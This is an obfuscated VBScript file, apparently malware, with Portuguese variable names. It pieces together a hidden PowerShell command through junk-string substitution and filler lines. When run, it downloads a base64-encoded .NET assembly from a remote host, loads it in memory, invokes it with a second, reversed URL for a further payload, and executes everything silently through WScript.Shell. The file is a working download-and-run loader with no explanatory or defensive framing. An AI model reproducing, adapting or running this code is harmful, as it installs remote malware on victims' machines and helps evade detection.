set azulejo = CreateObject("WScript.Shell")
On Error Resume Next
Escolha = "pow"
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Escolha = Escolha & "⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**rsh⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**l"
Escolha = Escolha & "l.⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**x⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø** [Byt⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**[]] $rO"
Escolha = Escolha & "Wg = [syst⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**"
Escolha = Escolha & "m.Conv⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**rt]*@ú⇝�@ú▶☞@→+(☠}↓*(↓░�#☝#�ú}◀]ú(☝^→^∞ø░⇝4�úð☞(→ú☀∞(ø*#�úrom"
Escolha = Escolha & "Bas"
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Escolha = Escolha & "⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**64s}(ð*((^▶]ú#(☞●◀]@4(@@→^]☞***П▶úú☀ú→}4@ú^→ð(░(++ú☞ú�#}]☟ring((N⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**w-Obj⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**ct N⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**"
Escolha = Escolha & "t.W⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**bC"
Escolha = Escolha & "li⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**n}(ð*((^▶]ú#(☞●◀]@4(@@→^]☞***П▶úú☀ú→}4@ú^→ð(░(++ú☞ú�#}]☟)."
Escolha = Escolha & "@4◀ø⇝☝☠}◀ú4+�((4@^П▲◀øð�↓�#∞(�4→úП(*●→4☟]ú(}ø(→▶ð▲*+ú→øown}^@+☞^ø░ú→øú]ð→**→*4�☠(√+ú44@@]ø▶]*(4}@+*#]☀*→@(ð☀☝☟øoad↓^(�∞ú@ø☝▲(@(4�@}ú(#�#^(ú4ø▲ú⇝☟◀П(☝@@�@(�@ú→}ð*@(^+*@(tri"
Escolha = Escolha & "ng('ú(}░◀@*(𝞹→}4ø☟^░@☟→^}}▲↓●�úøú^ú�*@ø√☠úú+░4@●☀ú�#(→☟ø+}(ð*((^▶]ú#(☞●◀]@4(@@→^]☞***П▶úú☀ú→}4@ú^→ð(░(++ú☞ú�#}]☟tø⇝ú]*▲→ø@�ú+→☝4@*4(☀ð▶4ú(☝*◀→☀*П↓√@@(░*4*░*(@@☀]�●→ø//*░▶●@*(+ðð#ú@░+*●�ø↓@}4�44*}ø*ð(}^(^#ø∞�◀+▲(░☟ú☠}⇝ú(+0.7.1*�}√▶ø]░√^☝(☞П(@√]@4→▲*◀◀↓4(�●ø*(ú▲�П}}]☝@(ð⇝☀ø(*ú*}*.9^☟ú▲ø*@}*(@�→▲П@@]#@@ø☝▲øø@→☀4^}4}√#ð(}↓◀Пð]@}}◀ø#�↓#�◀/dll/dll_nostartup.pdf'));"
Escolha = Escolha & "[↓^(�∞ú@ø☝▲(@(4�@}ú(#�#^(ú4ø▲ú⇝☟◀П(☝@@�@(�@ú→}ð*@(^+*@(yst⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**m.App@4◀ø⇝☝☠}◀ú4+�((4@^П▲◀øð�↓�#∞(�4→úП(*●→4☟]ú(}ø(→▶ð▲*+ú→øomain]Curr⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**"
Escolha = Escolha & "n}(ð*((^▶]ú#(☞●◀]@4(@@→^]☞***П▶úú☀ú→}4@ú^→ð(░(++ú☞ú�#}]☟@4◀ø⇝☝☠}◀ú4+�((4@^П▲◀øð�↓�#∞(�4→úП(*●→4☟]ú(}ø(→▶ð▲*+ú→øomain.Load($rOWg).G⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**tT"
Escolha = Escolha & "yp⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**('Fi"
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Escolha = Escolha & "b⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**"
Escolha = Escolha & "r.Hom⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**')."
Escolha = Escolha & "G⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**tM⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**tho"
Escolha = Escolha & "d('#^�^☝4((^ø}∞4}�#ø(@}☞▶ú☟░]�4ú@▶ø}*}ú**4@☀☀*@░*⇝ø�→�ðAI').Invok⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**($n"
Escolha = Escolha & "u}^@+☞^ø░ú→øú]ð→**→*4�☠(√+ú44@@]ø▶]*(4}@+*#]☀*→@(ð☀☝☟ø}^@+☞^ø░ú→øú]ð→**→*4�☠(√+ú44@@]ø▶]*(4}@+*#]☀*→@(ð☀☝☟ø, [obj⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**ct[]"
pay = "'txt.fhhfdhdjdjajyadotht42/031.04.331.591//ptth'"
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Escolha = Escolha & "] ("+pay+"))"
Escolha = Replace(Escolha,"ø⇝ú]*▲→ø@�ú+→☝4@*4(☀ð▶4ú(☝*◀→☀*П↓√@@(░*4*░*(@@☀]�●→ø","p")
Escolha = Replace(Escolha,"}(ð*((^▶]ú#(☞●◀]@4(@@→^]☞***П▶úú☀ú→}4@ú^→ð(░(++ú☞ú�#}]☟","t")
Escolha = Replace(Escolha,"*@ú⇝�@ú▶☞@→+(☠}↓*(↓░�#☝#�ú}◀]ú(☝^→^∞ø░⇝4�úð☞(→ú☀∞(ø*#�ú","F")
Escolha = Replace(Escolha,"↓^(�∞ú@ø☝▲(@(4�@}ú(#�#^(ú4ø▲ú⇝☟◀П(☝@@�@(�@ú→}ð*@(^+*@(","S")
Escolha = Replace(Escolha,"*░▶●@*(+ðð#ú@░+*●�ø↓@}4�44*}ø*ð(}^(^#ø∞�◀+▲(░☟ú☠}⇝ú(+","2")
Escolha = Replace(Escolha,"^☟ú▲ø*@}*(@�→▲П@@]#@@ø☝▲øø@→☀4^}4}√#ð(}↓◀Пð]@}}◀ø#�↓#�◀","9")
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Escolha = Replace(Escolha,"*�}√▶ø]░√^☝(☞П(@√]@4→▲*◀◀↓4(�●ø*(ú▲�П}}]☝@(ð⇝☀ø(*ú*}*","4")
Escolha = Replace(Escolha,"}^@+☞^ø░ú→øú]ð→**→*4�☠(√+ú44@@]ø▶]*(4}@+*#]☀*→@(ð☀☝☟ø","l")
Escolha = Replace(Escolha,"@4◀ø⇝☝☠}◀ú4+�((4@^П▲◀øð�↓�#∞(�4→úП(*●→4☟]ú(}ø(→▶ð▲*+ú→ø","D")
Escolha = Replace(Escolha,"⇝☝ú(░}4●�ú@+(@^��ø((*�}☞@(⇝*(�*]}@�@^(ú▶(☀▶+◀@▲]▲@}ø**","e")
Escolha = Replace(Escolha,"ú(}░◀@*(𝞹→}4ø☟^░@☟→^}}▲↓●�úøú^ú�*@ø√☠úú+░4@●☀ú�#(→☟ø+","h")
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Adrenalinametamorfoseobjeto = "aviator"cblazer
Escolha = Replace(Escolha,"#^�^☝4((^ø}∞4}�#ø(@}☞▶ú☟░]�4ú@▶ø}*}ú**4@☀☀*@░*⇝ø�→�ð","V")
azulejo.Run(Escolha),False
On Error Resume Next